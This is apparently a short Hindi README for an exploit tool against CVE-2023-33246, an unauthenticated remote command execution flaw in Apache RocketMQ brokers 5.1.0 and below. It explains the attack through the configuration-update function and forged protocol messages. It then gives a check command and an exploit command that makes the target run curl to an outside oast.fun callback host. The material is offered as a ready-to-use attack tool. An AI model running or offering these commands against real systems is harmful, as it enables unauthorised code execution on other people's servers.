
CVE-2023-33246 के लिए एक्सप्लॉइट जो Apache RocketMQ ब्रोकर्स को लक्षित करता है। यह कमजोर संस्करणों 5.1.0 और उससे नीचे पर बिना प्रमाणीकरण के कॉन्फ़िगरेशन अपडेट या नकली प्रोटोकॉल संदेशों के माध्यम से मनमाने कमांड निष्पादित करता है।
CVE-2023-33246 RocketMQ रिमोट कोड निष्पादन शोषण
RocketMQ संस्करण 5.1.0 और उससे नीचे मनमाना कोड इंजेक्शन के लिए संवेदनशील हैं। RocketMQ का Broker घटक एक्स्ट्रानेट पर लीक हो जाता है और अनुमति सत्यापन का अभाव है। एक हमलावर अपडेट कॉन्फ़िगरेशन फ़ंक्शन का उपयोग करके RocketMQ चलाने वाले सिस्टम उपयोगकर्ताओं के रूप में कमांड निष्पादित करने के लिए इस भेद्यता का शोषण कर सकता है। इसके अतिरिक्त, एक हमलावर RocketMQ प्रोटोकॉल सामग्री को गढ़कर समान प्रभाव प्राप्त कर सकता है।
जांच
./RocketMQRceCheck -host 127.0.0.1 -port 9876
शोषण
RocketMQ_RCE_EXPLOIT 127.0.0.1 10911 curl chw9ft72vtc00002z5k0ge6rz7eyyyyyb.oast.fun/test